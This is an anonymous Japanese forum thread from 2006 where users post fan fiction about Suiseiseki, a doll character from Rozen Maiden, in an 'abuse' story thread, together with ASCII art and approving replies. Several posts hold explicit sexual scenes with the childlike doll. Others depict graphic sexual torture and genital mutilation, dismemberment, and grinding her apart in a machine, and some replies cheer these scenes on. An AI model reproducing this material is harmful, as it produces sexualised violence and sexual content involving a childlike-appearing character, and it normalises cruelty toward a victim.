「おかえりですぅ。今日はちび人間のためにクッキーを作ってやったです。ありがたくたべやがれです。」
「それはおいしそうだな。ありがたくいただくよ。」
そういってリビングへ行くとそこには信じられない光景が広がっていた。
なんと翠星石が裸エプロンで可愛らしい小さなクッキーを作っていたのだった。
僕はあわてながらも、顔を赤らめながらこういった。
「す、翠星石!難なんだよその格好は!」
「べ、別になんでもないですぅ」
という翠星石も少し、いやかなり照れくさそうに頬を赤らめながら言った。
僕は急に翠星石に対する性欲が沸いてきてクッキーなんかよりも翠星石を食べたくなってきてしまった。
善は急げ。早速僕は行動に移す事にした。
「翠星石。ちょっといいか?」
「なんか翠星石に用ですかぁ?」
そういうと僕は僕に背を向けクッキーを作っている翠星石を後ろから抱きしめてソファーまで連れて行った。
「な、何するですかぁ人間。は、はなすですぅ」
僕は無視して翠星石をソファーへやさしく寝かせた。
そしてそっと口付けをする。
「んっ・・人間・・・」
翠星石もここから大抵どうなるかは予想がついていてまた少なくとも少しはその行為を望んでいるのだろう。
たいした抵抗は見せなかった。
僕はエプロンを脱がした。
翠星石は恥ずかしそうに僕を見つめてきた。
僕はまず翠星石のまんこを舐めてあげた。
「ひゃっ!!」
「どうした?こういうのは苦手か?」
そういうと翠星石は恥ずかしそうに嫌いでは・・・ないです・・とだけいった。
「そうか」
僕はそういうと再び舐め始めた。
そのまんこはじょじょに濡れていき、それに比例して翠星石のあえぎ声も強くなっていった。
「ひゃっ、あふっ、あぁぁぁ、き、気持ちい。気持ちいですぅ〜〜!」
そういうと翠星石は一瞬びくっと身体をふるわせた。

やべ。親帰ってきた。一旦ここまで。続きはまた今度。
下手で場違いでごめんな。興味ないやつは読み飛ばしてやってくれ。

170 :名無しかわいいよ名無し:2006/02/03(金) 23:31:32 ID:GWAdK1nO
>>169
ただのエロじゃん。
別スレにエロ小説のスレあるから
そこに書き込んだほうがいいんじゃね?

171 :名無しかわいいよ名無し:2006/02/03(金) 23:57:13 ID:yIhMSVYk
エロとはまた意表をw

172 :名無しかわいいよ名無し:2006/02/04(土) 00:10:06 ID:IfR/Xk+s
俺の名前はデュード
今日は手っ取り早く行くぜ!

「よう翠星石!俺ほんと極悪人だったけど、今日から改心しようと思ってんだ。その気持ちとしてまずはこれを受け取ってくれ」
俺はそういって5センチ四方の箱を翠星石に渡した。
「え?ちゃんとした人間になってくれるですか?しゃーねーな、そういうなら貰ってやってもいいです」
「おう、早速開けちゃってくれ」
リボン結びされた紐を解き始める翠星石。そして即効で小屋から逃走する俺。
「?見られるのが恥ずかしいものなんですか?結構恥ずかしがりやなんですね」
そういって彼女が紐を解いた瞬間、小屋が閃光に包まれた。
次の瞬間小屋は木っ端微塵になっていた
「これだからやめられないぜ!」

173 :名無しかわいいよ名無し:2006/02/04(土) 01:49:17 ID:IfR/Xk+s
すいません、デュード疲れました。
誰か後引き継いでください。

174 :名無しかわいいよ名無し:2006/02/04(土) 02:27:29 ID:2HdoRL7g
ある晩夢の中で翠星石を見たので。こっそり後をつけてみた。

「あいつどこに行くつもりだ?確かこっちには…」

そう、こっちに行くと、あいつが「チビ樹」と呼んでる僕の樹があるはずだ。

いた。
翠星石が僕の樹の前で何かやっている。

175 :名無しかわいいよ名無し:2006/02/04(土) 02:34:00 ID:jU4oTlF0
なんとドレスをまくり、自分の股間をチビ樹に押し付けながら腰をくねらせていた
早いリズムで小刻みにハッハッと甘い息を出し、何かに取り付かれたようなうつろな表情で
ひたすらこすり続けていた

176 :名無しかわいいよ名無し:2006/02/04(土) 03:07:04 ID:0pQl2ZEh
             ○<" ̄\ 。  
           。 ゚.o  |____) 。。
 。            ヽ∬*‘e‘) /<ウマッテシマッタミダイデスゥ…… 
。              (::.     )。 。
""⌒⌒⌒"⌒⌒""⌒⌒⌒"⌒⌒""⌒⌒⌒
   ___
 く/',二二ヽ>
 ⌒⌒⌒⌒⌒

177 :名無しかわいいよ名無し:2006/02/04(土) 05:41:02 ID:2HdoRL7g
>>175
「ああ〜チビ人間チビ人間、イクですイクです!もうイッちゃいますですぅ〜っ!!」


ぷっしゃああああっ!!!

翠星石はそう叫びながら体をガクガク震わせて、
僕の樹に潮を噴いた。
僕の樹の周りに、むあ〜っと湯気がたつのが見えた。

178 :名無しかわいいよ名無し:2006/02/04(土) 05:50:43 ID:2HdoRL7g
翠星石は顔をほてらせたままグッタリとしていた。

そんな翠星石を見ていたらムカッ腹が立ってきた。

あの性悪人形め、どうりで最近、朝になるとビンビンに勃ちすぎると思った。
毎朝真紅たちにバレないよう処理するの大変なんだぞ?
もしバレたら姉ちゃんがまた
「思春期の男の子は云々」
とかほざくに決まってる!

179 :名無しかわいいよ名無し:2006/02/04(土) 09:43:56 ID:2HdoRL7g
「はぁ〜…気持ち良かったですぅ…」
イッてしまった後、もうろうとしていた翠星石だったが、意識がもどったようだ。

「ふぃ〜そろそろ帰るかですぅ……っ?!」

起き上がろうとしたが起き上がれない。
何とか動かない手足の方を見れば、なんと、肘と膝のところで腕と脚が固定されているではないか。
今の翠星石の状態は、さながら蛙のようだった。
しかも下半身はスカートをめくられ下着も着けない丸出しの"おっぴろげ"状態だった。

180 :名無しかわいいよ名無し:2006/02/04(土) 09:55:07 ID:eUPJWQnQ
デュード乙

181 :名無しかわいいよ名無し:2006/02/04(土) 09:56:01 ID:2HdoRL7g
「いやあああっ!な、何です何々ですかぁ〜??」

「何だ起きたのか」

「ッ!!?ち、チビ人間!こ、こ、これはどういうことですか!さっさと解きやがれです!」

「うるせえ!人の夢の中で小便まき散らしやがって!しかも僕の樹をズリネタにしてオナりやがって!」
「な、何を馬鹿なことをほざきやがるですか!この翠星石がそんなはしたない事をするわけがねーです!」
「ああ〜チビ人間チビ人間、イクですイクです〜」

「!!!………とんでもないゲス野郎です!生かしちゃおけねーです」
「そんなこと言える立場だと思うのか?」

182 :名無しかわいいよ名無し:2006/02/04(土) 10:06:28 ID:2HdoRL7g
「どうだ、動けるものなら動いてみろ。まあ無理だけどな」
「うくっ…す、翠星石をどうするつもりですか」
「なに、すぐ帰してやるさ。ただその前に」
そう言ってポケットから取り出したのは裁縫セット。
意外な物を見て戸惑う翠星石。
「そ、それで何をするですか?」

「決まってるだろ?二度と僕の夢でオナニーできないよう…(ニヤリ)……去勢するのさ」
そう言い放つなり僕は針に糸を通した。
そして翠星石の股間の前にかがみこみ、「裁縫」を行った。

183 :名無しかわいいよ名無し:2006/02/04(土) 10:19:23 ID:2HdoRL7g
まずはマチ針だ。こいつは裁縫をするとき布と布がズレないよう留めるのに使う。
僕はおもむろに翠星石の人形とは思えないほどリアルなビラビラに突き刺した。

「ぎぃやああああっ!!!」
翠星石が泣き喚くがマチ針はその役目を果たし、はずれることはない。
次に糸を通した縫い針で翠星石のワレメを縫い上げた。
ワレメに針を刺し、糸をくぐらす度に翠星石が
「ぎぃやぁあっ!!」「ひぃぃぃぃっ!!」「うぎぃぃぃっ!!」
とか喚くが無視した。
ワレメを完全にふさいでしまえば、もう小便をまき散らされることもないからだ。

184 :名無しかわいいよ名無し:2006/02/04(土) 10:36:58 ID:2HdoRL7g
「うっうぐっ…ぐえ…」
鳴咽をもらすものの泣き叫び疲れたのかジタバタしなくなったな。
さてワレメも縫い上げたことだし、最後の仕上だ。
僕は翠星石の縫い上げたワレメからピョコンと顔を出してる「豆」をつまんだ。

「い゛っ!ひぃあっ!」

何だ、まだ感じてんか、こいつ?まあいいさ。それも今日で最後さ。

僕は翠星石の身体で最も繊細かつ敏感な部分である「豆」の付け根に、しつけ糸をまいた。
糸が敏感なところを刺激し、かつ血行もとめたせいだろう。

「豆」が徐々に肥大化してきた。

185 :名無しかわいいよ名無し:2006/02/04(土) 10:57:46 ID:2HdoRL7g
ヴツン!

「い゛あ゛ぎいああはあああっっっ!!っぁぁぁっっ!?!」

翠星石のオッドアイの眼が飛び出さんばかりに見開かれ、舌はちぎれんばかりに口から飛びだし、目、鼻、口をとわず、涙腺から表皮から肛門まで体中の穴という穴から、あらゆる粘液がまき散らされた。

当然だろう。少女の体で最も繊細かつ敏感な器官が僕の手にした裁断用鋏で永遠に失われたのだから。

もうこれで彼女が僕の夢の中で快楽にふけることは二度とないだろう。
僕は変わりはてた翠星石をあとにし、
振り返らずに現実世界に戻るのだった。

END


186 :名無しかわいいよ名無し:2006/02/04(土) 13:58:59 ID:noSYfBbk
ヒヒヒッ!いいよいいよ〜!

187 :名無しかわいいよ名無し:2006/02/04(土) 15:35:55 ID:YsNwm1Nq
     .!                   '|
      |_, -‐'‐. ̄ ̄ ̄‐‐ー---、     /                  /
_,______|___________       `‐- 、/                  /
|              ´ ̄ ̄ ̄ ̄‐ー-イ,                   /   .
\                        `ゝ、              /   /
  \  ___------------‐-- 、____       , /          /   ,  ヽ
   `|   、 .| .!       、   `''=、  /           |  'ニ''゙l′ | 、
    |  │/ ./ l、ヽ -、    \  .、  \           ,ノ'| 、 .ゝ/.ゞ  /
    ! :!  7 人、ヽ \\、  __-ニ, 、.!   ヽ        _r'´  | `ー、 ___/
    .! ヽ/, イl==-ヽ、 `ーニー-=j|l |  .ト、 !      r'´‐ \ 亅  |
    ='/!、.!`'' /  \、_  |,''‐'ノ'゙,| | │ヽ.!    . /   ノ゙゙〈\  .|
     ヽ\_゙' ̄    ,  ´  ̄´/ | / .!|  ,r'´二`ヽ_/ / `'y/
      \ T'~    -     ,j/, ト-─‐!--! .i'´ `! |', z〈、  / 後はこの庭師の鋏でお相手しよう
        \ `=、_    , -''´ / _____   _-/r/''─`Y´
   '二'' ̄し--‐丁_リミ7‐, -‐'ニ‐' ´ ̄   ゝ、 .!i'´''.!.!  , ! _!
 /´ .し'_jヽ`|r'`>'´  `‐‐-/, イ-!ゝi‐l、  .//  .,ノ-ニゝ '!- 、'′
     !__ ノ_ノ´   ‐=t_ ./ rへ_.!ッ .!.7ヽ 〃  // _  ヽゝ
  ,_-‐‐' ´.!.く    -、  〕\/ ノ `y !フ // . //,‐'´  Ti  l |
./     .| r'´  -、_  スハ ヽ''  `').! |‐' /ノ/_    !|  .!‐7
       | ./'-┬ 、, フ r |''| 、ヽ  , 〈‐' , |/./、  `丶、.!| ,‐' /


188 :名無しかわいいよ名無し:2006/02/04(土) 16:09:15 ID:yD3SgKzr
いつのまにか、エロになってるじゃないか

189 :名無しかわいいよ名無し:2006/02/04(土) 16:20:40 ID:eySNj7xq
デュードみたいなのがいないと伸びないな

190 :名無しかわいいよ名無し:2006/02/04(土) 19:57:03 ID:mNSxf7qm
>139-141の人に期待してる

191 :名無しかわいいよ名無し:2006/02/04(土) 20:52:45 ID:jU4oTlF0
>>177
GJ!
まさかここまでになるとは思わなかった(いや、少し期待してた)
エロと虐待の融合も、ひと時の清涼剤みたいでいいね

なんか想定していたストーリーがあったらスマソ

192 :名無しかわいいよ名無し:2006/02/04(土) 21:55:47 ID:9u0TlL+H
自分の愛する人にオナーニ見られた上、虐待される快感ですかね

193 :名無しかわいいよ名無し:2006/02/05(日) 02:01:28 ID:nDo0aR8p
さーて、おれのなつやすみ2でもやって寝るか

194 :名無しかわいいよ名無し:2006/02/05(日) 03:51:02 ID:ZDKJicK6
夜中になってたまたま目が覚めると、翠星石の鞄からなにやら怪しげな物音が聞こえてくるので、こっそり耳を近づけてみた。
「ああ・・・ジュン!そんなことダメですぅ・・・あああ、イク!」
うわ、こいつ俺でオナニーかよ!しかも人形が!
だがジュンの深層心理ではそんなことより自分が人形ごときのオナネタにされたという怒りに満ちていた。
「はあ、はあ・・・さて今日もジュンにキスして寝るです」
その言葉を聞いてこのままでは俺がやばいというアルゴリズムがジュンの頭の中で構成された。
だが時すでに遅し。
鞄を開いた翠星石と鉢合わせになってしまった。
「あ・・・ジュン、今の聞いていたですか?」
「ああ、一部始終。まさかお前がそんな風に考えていたとは・・・」
しばしの沈黙が訪れる。

ダメだこの先描けない

195 :名無しかわいいよ名無し:2006/02/05(日) 04:07:57 ID:JQ82RhzE
その展開ではどうかんがえても虐待ではなく甘エロに突入ではないか。

196 :名無しかわいいよ名無し:2006/02/05(日) 04:53:05 ID:OqqSaP3a
めっちゃきもい!!ワロタ!

197 :名無しかわいいよ名無し:2006/02/05(日) 05:14:11 ID:y9d2S0Q4
俺が続きを描いてやるぜ。

俺をズリネタだと?
調子こいてんじゃねえぞ糞が!
俺は装備していたハンマーで翠星石の綺麗な顔を叩き割る
ッグシャ!
「きゃああああ!顔が!顔が!」
いいねえ!その苦しみ方!アッハッハッハ!
そんなに俺のことが好きならそのオマンコ出しやがれ!
割れ目にスコップねじ込んでやるぜ!
翠星石の秘処の部分を覆う衣服を剥ぎ取り、綺麗な割れ目にスコップをグサ!
「ぎいいやあああ!痛いですぅ!そんなところ刺すなですぅ!」
ここ掘って金でも出てくるか?出てこなけりゃぶっ壊すからな!
ッオ!逆に汚え汁が出てきたぜ!ふざけんな!
さらに刺しまくる!ッグサ!ッグサ!
オラ!お決まりのカマでシュビーン!四股切断!
そして俺は四股を切断されて転がる翠星石を見やった。
オナニーを終えて安らかな眠りを迎えようとしていた彼女は、今はこの先の自分の身の安全を案じで怯えている。
俺はおもむろに近ずいていって、彼女の耳元でささやいた。
「いいか、よく聞け…」
ジュンはデュード様であることを告げると、翠星石は凍りついた。
「う・・・そんな・・・私が愛したジュンがお前だったなんて・・・」
傑作ですぅ!ってか?(笑)
だが頭にくるぜ!俺はジュンでもお前でもない!デュ・ー・ド・さ・まだ!
鋏で口を切開して喋れなくしてやった。
トドメだぜ!カタナで一刀両断!これぞサムライ魂ィ!

To Be Continued

198 :名無しかわいいよ名無し:2006/02/05(日) 06:51:25 ID:PzcbRZNe
>>197スコップをグサ!でチョトワロタ

199 :名無しかわいいよ名無し:2006/02/05(日) 08:35:26 ID:3YO07nP4
エロはエロ板行った方がよくね?
微妙に、虐待になってないし

200 :名無しかわいいよ名無し:2006/02/05(日) 10:41:56 ID:MBCb6N88
>>197
綺麗なwwwwww

201 :名無しかわいいよ名無し:2006/02/05(日) 11:12:00 ID:i1atBzsm
蒼星石虐待スレみてみてぇ

202 :名無しかわいいよ名無し:2006/02/05(日) 12:09:06 ID:xnaLJcrn
>>197
GJだ!

203 :名無しかわいいよ名無し:2006/02/05(日) 15:06:55 ID:OqqSaP3a
視界の隅で、床をカサカサと動くものが。
ウゲッ!ゴキブリだ!
どっから入ってきやがった!

ハエタタキないかなあ。おっとちょうどいいものがあった!
四肢をちぎられた翠星石の髪を掴んでゴキブリ目掛けてたたき付ける。
ドガッドガッビシィッ!股間から流れ続けるきったねえ汁を部屋中に撒き散らす。
もはや翠星石は抵抗する気力も無い。
「フグッ…アウッ…」と蚊の泣くような声がかすかに聞き取れるくらいだ。
汁まみれの股間は、床にたたき付けられ続けて青紫になり、腫れ上がってくる。
なんと精巧なドールだ。

204 :名無しかわいいよ名無し:2006/02/05(日) 15:23:32 ID:OqqSaP3a
グッシャアアア!
ついに翠星石の股間がゴキブリにクリーンヒット!
やったね!
そのまま翠星石を宙づりにすると、くっついたままのゴキブリのハラワタと翠星石の汁が
混ざりあって床にボタボタと落ちる。
よく見ると翠星石の股間でゴキブリが動いている。
一本の足が翠星石のクリをかすったかと思うと、何とこのエロ人形はピクンと反応し、
ハウッと声を漏らしやがる。
…感じてやがる。涙を流しながら。
ゴキブリの足の動きに合わせて、「ん…んっ…」と呻く。

この淫らな糞人形に、どうとどめを刺してやろう。

To Be Continued

205 :名無しかわいいよ名無し:2006/02/05(日) 15:41:48 ID:XE569oQh
ドール相手に虐待なんて、変態が多すぎるですぅ

206 :名無しかわいいよ名無し:2006/02/05(日) 18:18:13 ID:i1atBzsm
書いてるやつも明らかに翠星石を可愛いと思ってるから虐待してるんじゃねーの?
可愛くもないただうざいだけのヤツならもうちょい別のやり方があると思うしな。
204のとか明らかにエロ混じってんだろ。
まぁ俺が言えた事じゃないが。

207 :名無しかわいいよ名無し:2006/02/05(日) 20:58:09 ID:+1t40jvA
可愛さあまって憎さ百倍

208 :名無しかわいいよ名無し:2006/02/05(日) 21:45:28 ID:i1atBzsm
ははw
なるほどなww
207イイよw頭w

209 :名無しかわいいよ名無し:2006/02/05(日) 22:28:02 ID:ch6RTnuZ
シンプルに虐待

翠星石がカバンで寝てる隙にカバンのフタ同士を接着剤で固めてやった。

あ、翠星石が起きた。カバンが開かないからビックリしてるらしい。中からドンドン叩いたり暴れたりしてる。
カバンの中で翠星石が暴れるたびにカバンが床からピョンピョン跳ね上がるのが見ていて、ちょっと楽しい。
「開かなね〜ですぅ!」「ど〜なってるだですぅ!」「ボケっとしてないで開けやがれですぅ!」
とか喚いてる。

無視しておこう。

さてどうしてくれよう。

電ノコでブッた切ってもよし。プレス機でいっきにつぶすもよし。糞尿まみれにするもよし。
焼却炉に放り込むか?コンロでジワジワ焼き焦がしてやるか?自衛隊の演習場に放置してきて射撃の的にさせるもよし、戦車に踏み潰されるもよし。
ドブ川に違法投棄?黒髭危機イッパツのごとく少しづつ串刺し?小さな隙間からゴキブリやシロアリとか注入する?
それとも硫酸流し込み?冷凍庫で凍らせる?遠心分離機に放り込んでみたりして?
水銀燈にあげてみるのもいいかも?

僕はワクワクがとまらなかった。

END


210 :名無しかわいいよ名無し:2006/02/05(日) 22:47:14 ID:94qiHOA5
「空気が乾燥してるせいか目が渇くですぅ、目薬よこしやがれですぅ」

「え〜とどこだったかな」ゴソゴソ

「とっとと出しやがれです。まったく役立たずです」
(ムカッ)「ほら、あったぞ」

「よこしやがれですぅ!」(目薬使用して目をパチパチさせようとする)

「?!目、目が開かねーですぅっ!!」


(さすが『瞬間接着剤』だなw)

211 :名無しかわいいよ名無し:2006/02/05(日) 22:54:44 ID:i1atBzsm
>209
水銀燈にあげてみるの続編希望

212 :名無しかわいいよ名無し:2006/02/06(月) 00:14:40 ID:AiBQsJ3a
俺が目を覚ましたとき、そこは一面死体の山だった。
そして濁った空から血の雨が降ってくる。
なんなんだここは!俺様もついにキレちまったか!?
この非現実的世界で俺様ことデュード様はおかしくなりかけていた。ま、もとからおかしいかもしれねえけどよ。
だが死体の山の上を歩くのも悪くはないな。
しばらく歩いていると、翠星石が古ぼけた木の前に立っている。
「あいつ!また殺してやるぜ!が、その前に少し様子見だ」
翠星石はその気を睨んでいた。
「庭師としてあいつを更生させるです。そうすればもう少しマシな人間になる筈・・・」
そう言って翠星石はどこからともなく現れた如雨露に水を溢れさせ、木にたっぷり水を与えた。
すると腐りかけている木がさらに腐食し始めた
「うう・・・うげえええ!なんだこれは!気持ち悪ぃ!」
途端に俺は激しい嘔吐に襲われた。
糞人形め!まさかこれは俺の夢!あいつ、俺の夢の中に!
「うげえ、翠・・・星石!てめえ!ただじゃおかねえぞ!」
「そ、そんな!適度な養分を与えた木が腐ることなんてない筈です!」
驚く翠星石。
「まさか!見も心も腐りきっているため、養分がマイナスに働いて!これは救いようがないですぅ」
その通り、俺様はすべてが腐りきっている。だからこれ以上木の生長は見込めないし、綺麗な水はさらに腐食させる。
必要なのは・・・おまえらの血肉だぜ!

213 :名無しかわいいよ名無し:2006/02/06(月) 00:15:11 ID:AiBQsJ3a
咄嗟に翠星石に掴みかかる!
「っきゃ、放せですぅ!」
ふざけるなよ!こっちはさっきから吐き気に耐えてんだ!
おっと、うげええええ!!!
翠星石の顔面にゲロをぶちまける。
朝食べたコーンフレークや夕食のパスタなどが消化しかけのまま翠星石の顔を汚す。
お前も食えよ!
俺は無理矢理翠星石に接吻してゲロを吐く。
「ん・・・んんん!・・・っげほっげほ・・・げえぇぇぇ」
あまりの汚さと匂いで涙目になる翠星石。
口からはゲロが垂れている。
おい!しっかり食えよ!吐くんじゃねえ!
腹を思いっきり蹴飛ばす。
と、このままだといつもと同じパターンで面白くねえ。ここは俺の夢の中だ。だからなんでもありなわけだ。
つまり・・・俺様が法律だ!
とりあえずこいつを掴みあげて、あるところへつれていく。
え〜と俺の記憶では人肉工場は〜っと。
あっという間に肉屋についた。
その精肉工場では巨大なファンがグルグルと回っており、何人もの人間が粉々にされたことが分かる内蔵が大量に落ちている。
それを見た瞬間暴れだす翠星石。
「や、やめるですぅ!あんなのに入りたくないですぅ!う、っぐす、っひぐ・・・死にたくないですぅ・・・」
残念だが俺の前でそういう顔するのは逆効果だぜ。それは俺に対して殺してくれとでも言うようなもんだ。まあ何をしようが殺してるけどな。
機械の上に立つ俺。翠星石を縄で縛り上げ、ゆっくり、ゆっくり、回転するファン状のカッターに降ろしていく。
「うう、やめるですぅ!お願いだから助けてですぅ!ど、どんなことにも文句言わないですから!」
へえ、で?
俺は縄から一気に手を離す。翠星石の下半身はファンに巻き込まれて粉々になった。
「きゃあああああああああ!あ、足の感覚がないですぅ・・・」
アーッハッハッハッハ!いいザマだぜ!
「ついでに全部砕けろ!」
縄から完全に手を離すと、翠星石の残った上半身は機械に巻き込まれて粉々になった。
ハハハハハ!最後に『ですぅ』とか聞こえたぜ!マジ受ける!
さーて小便して帰るかな。
俺は自分の心の木に小便をかけてから現実世界に戻るのだった

To Be Continued

214 :名無しかわいいよ名無し:2006/02/06(月) 01:02:43 ID:+xqOcP7j
その晩、寝苦しくて目が覚めた
朦朧としている意識でさまよう中、耳元で聞こえた

く、腐ってるですぅ お前みたいな糞人間なんて、愛ゆえの虐待ではないですぅ
いつか、ぶっ殺してやるですぅ

215 :名無しかわいいよ名無し:2006/02/06(月) 01:24:02 ID:AZuql1pL
虐待というか虐殺

216 :名無しかわいいよ名無し:2006/02/06(月) 01:28:11 ID:AiBQsJ3a
>>214
ちょ、てめえ
今のはマジギレ寸前まで来たぜ
ハンマーでドーン!ッグチャ!
はい死亡。小便でも食らっとけ!
いい肥やしになるぜ〜

217 :名無しかわいいよ名無し:2006/02/06(月) 01:36:30 ID:VAHS0ejE
デュードの描く虐待が気に入ってる俺はおかしいのだろうかw

218 :名無しかわいいよ名無し:2006/02/06(月) 03:01:39 ID:5JRNA1+y
      ___  
     く/',二二ヽ> 
     |l |ノノイハ))  
      |l |リ゚д゚ノl|  いた・・・いです・・・ぅ
−−−−−−−−−−>
     ノl_|(l_介」).|
    ≦ノ`ヽノヘ≧ 
.   ミく二二二〉ミ


219 :名無しかわいいよ名無し:2006/02/06(月) 05:17:39 ID:ZW3xwpa+
ある晩、ふと目を覚ましたら翠星石が暗闇の中ベッドの前で何かつぶやいていた。
寝たフリして聞いてみた。

「ウッ…ハ…(クチュクチュ)ウウウッ…ッ…チ、チビ人間…」

おいおいおい!この、お下劣人形!俺の寝顔をズリネタにして、こいてやがる!
声を抑えているのは真紅たちに気付かれないためと、スリルを楽しむためってか?
けっエロ人形め、どうするか見てろ!
俺はガバッと起き上がった。

「きゃっ」
当のズリネタがいきなり起き上がってきたので翠星石は心臓が飛び出さんばかりに驚いた。
目を丸くして下半身丸出しで硬直している。

220 :名無しかわいいよ名無し:2006/02/06(月) 05:27:52 ID:ZW3xwpa+
「?…寝ぼけてるですか?」

ふっ、俺もなかなか演技が上手いよな。そう今の俺はどっから見ても寝ぼけてるようにみえるはずだ。

「ふぅあせったです、びっくりしたですぅ」

下半身丸出しでそんなことをつぶやいてやがる。
俺はそんな翠星石に虚な目でいきなり抱きついてやった。
「ひゃあうっ!?」
よし、先手必勝!そして続けざまに耳元でささやいてやった。
「す…き…だ…翠…」
そして寝ぼけたフリで抱きしめる。
「え?え?え?」
けっ、目をうるませてやがる。下半身丸出しでw


221 :名無しかわいいよ名無し:2006/02/06(月) 08:39:57 ID:ZW3xwpa+
「好きだ…翠…」
「ち、チビ人間…そんなことを言われたら、す、翠星石は」

とかなんとか言いながら股間をいじりまくってる。
けっ、おおかた俺が寝ぼけてると思って妄想働かせてるんだろうが、そうはいくか!

俺は声をあげた

「大好きだ…翠…すい………水銀燈〜っ!!」

「な?!」

「水銀燈の胸!水銀燈の太もも!水銀燈のふくらはぎ〜っ!!!」

「な、なんだと!?ですぅっ!!」

ふははは、バカめ!これはさすがに屈辱的だったのか、思わず大声をあげやがった。

うかつな淫乱人形めw

222 :名無しかわいいよ名無し:2006/02/06(月) 08:57:54 ID:ZW3xwpa+
他の女の名前を聞いて声を荒げた翠星石は背後の気配に気付いていなかった。

「いったい何の騒ぎ……す、翠星石、貴女何やってるの!?」
「あれ〜翠星石がおまんまん触ってるのなの〜」

さらに部屋のドアが大きく開く
「きゃ〜何?何?ジュン君、今のすごい声〜?あっ」
さらに俺もつい今し方起きたような演技。
「ふわ〜うるせえなあ何だよこんな夜中に…わっ!何だオマエ?!」

みんなの視線の先には下半身丸出しで秘部に指を突っ込んだ翠星石が顔面蒼白出てきた固まっていた。


笑えるぜ。

223 :名無しかわいいよ名無し:2006/02/06(月) 09:24:11 ID:ZW3xwpa+
終わり

やべえ夜勤明けで眠くて送信しちまった。

何だよ 蒼白出てって…

224 :名無しかわいいよ名無し:2006/02/06(月) 12:04:00 ID:vDpQRoE3
こういうソフトないじめを受けてる翠はかわいいな(;´Д`)ハァハァ

225 :名無しかわいいよ名無し:2006/02/06(月) 19:31:58 ID:HxGt2xMn
219〜222GJ!
もっとそういうのかいてくれ(笑)

226 :名無しかわいいよ名無し:2006/02/06(月) 22:32:42 ID:N6rgotEh
辱める虐待最高ですね。
ちがうですぅ、と言いながら腰は動いてるとか。

227 :名無しかわいいよ名無し:2006/02/06(月) 22:49:05 ID:HxGt2xMn
話がわかるなw>226

228 :名無しかわいいよ名無し:2006/02/07(火) 09:01:24 ID:0p/A9r1c
ヒュルルルル…


ガンッ!
「んぎゃあっ?!」

ガラガラガッシャーン!
フニャ〜ッ!!
ウーワンワンワンッ!!
「キ、キャーイタタタタッ!ヒッカクナデスゥ!カマナイデデスゥ〜ウギャアッ!アシヲカミクダクナデスゥ〜!スイセイセキノドレスニションベンカケルナデスゥ〜!」

キキキ〜ッ!ベキバキグシャッ!
「バッキャッロー!キヲツケロ!」

「アアッ!?ス、スイセイセキノ、カバンガクルマニヒカレテ、ペッチャンコノコナゴナデスゥ〜(泣)」


…ん?外が騒がしいな。何かあったのか?
まあいいや。昨晩のうちに窓ガラスに通販で買った
"防犯用の耐衝撃フィルム"を貼っておいたんだ。
これでいつあの性悪人形のカバンが飛び込んできても大丈夫さw
end

229 :名無しかわいいよ名無し:2006/02/07(火) 16:24:14 ID:DvEX6WZ8
参謀「長官!前方より浮遊する鞄を発見!」
長官「よし主砲仰角合わせ!対空砲火準備!」

230 :名無しかわいいよ名無し:2006/02/07(火) 18:40:52 ID:AuTaPglx
王「まぁ落ち着け。ようく見てみれば可愛いお嬢さんじゃあないか。」
長官「し、しかし王様。」
王「よいではないかよいではないか」

翠星石到着

翠星石「助けてくださいですぅ。蒼星石が、妹の蒼星石が。」
王「これは驚いた。まさかローゼンメイデンシリーズの1体であるとは・・・」
翠星石「妹が街のハズレにある小屋に監禁されています。助けてあげてくださいです。」
王「長官。」
長官「はっ。ジュン隊長。以上仰せのままだ。」
ジュン「はっ。」
蒼星石は無事救出されて2人はいつまでも仲良く恵まれた宮殿で仲良く暮らしましたとさ。
めでたしめでたし。

231 :名無しかわいいよ名無し:2006/02/07(火) 22:40:28 ID:iVC0oYMk
;:;:;::;;:&l:;;:;:;ii;::;:''';:$ .,;;::':;:、__, ;:,,w';:.,;;::.”,;;,.': #
;;;(:;;:ロ;:];;:;、;:*';:.(,;;::':;:;:,,.'ソ.';:.';:.,(;;:#:ノ.';:. ` @
从;;::人ノ」」ヾ;:;;、__,;:;::%'';:.,;;'::;:,),.'::;:':;〜 ∂   % ←宮殿
」」」〈〉」」lll」」」ヘ:;@:/!;: (\a; ロl::;ノ $ ;  “  :
」」」〈〉」」%」」」」」」」 |lllミ;:;~s ; Y ゛ `。     ; .
」」」〈〉」」」」」」」」」」 |llliii| \ρ  #   " 々゚     ` ':,
」」」〈〉」」」」」」」」」」 |llliii| = ;         ,
」」┌──‐┐、 」」 |llliii|  ;;
」」..| ΟΧ.│.:|..」」 |llliii|
」」..|デハ゜ー.ト|..::|..」」 |llliii|
─┴──‐┴┴─―──────┐
 ̄| ̄ ̄| ̄ ̄| ̄ ̄| ̄ ̄| ̄ ̄| ̄.||_,||   _______,,.
 ̄| ̄ ̄| ̄γ´`ヽ .| ̄ ̄| ̄ ̄| ̄.|夜|.i.  i'| ロ ロ ロ ロ ロ {,i;l
:二二二二_ ゝ -''` ー-  _ 二二 |九| |  l:| ロ ロ ロ ロ ロ (';=;
: |  ̄|  ̄/          \  ̄||時| |──‐:‐ロ ロ ロ ロ ロ l_i
: |   | /             ヽ _||迄| |[][][][][] |    .___|________
l!二二,′              ',il|営| |___________|  lニl´」」」」」」」」」」」」」」」」」」」」」」」」
__ !    , -────── 、 |゙,|業| |[][][][][.:/.「 | | ダブゥ&ミコネコ ショールーム _
二|  |    |  `ィェァ    `ィェァ| |  ̄.l l__,/ _|=| |  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|| |
二| |    `───────' |   .l_| [][][|  |■|:::| |.  //       /   || |
 ̄.  .|                 |   ̄| | _____l  |□|:::| |/[ダブゥ―ッ]  //   || |
 ̄  |                l'゙ ̄ ̄| |.[][][|    ̄| :| |   /`wヘ  /       || |
 ̄||. l              /~~゙|l ̄|| |___,l     | :| | .~( *゙д゙)(NewMegiroga)|| |
/||  |  ヽ          / .  ||/||.i    \.   |=| |rウ⌒ω⌒|\/|  |\/| . || |
/||  |    ` 、     /| // .||/      \.[|::| | ゞ__,*、.ヽ|゚Д゚|人|‘∀‘|ノ || |
||==  }       `ヽ_人,ノ||==||==||===||____________,| :|||==||==i ̄ ̄ ̄il==、||==||==||==

232 :名無しかわいいよ名無し:2006/02/08(水) 02:58:35 ID:vdku2BO0
「明日遊園地行かないか?二人っきりで」
「!…な、なにをいきなり寝ぼけたことほざいてやがるですか!寝言は寝て言えですぅ!」
「そっか…残念だな」
「そ、そこまで言うなら、しゃーねーから、行ってやっても良いですぅ♪」
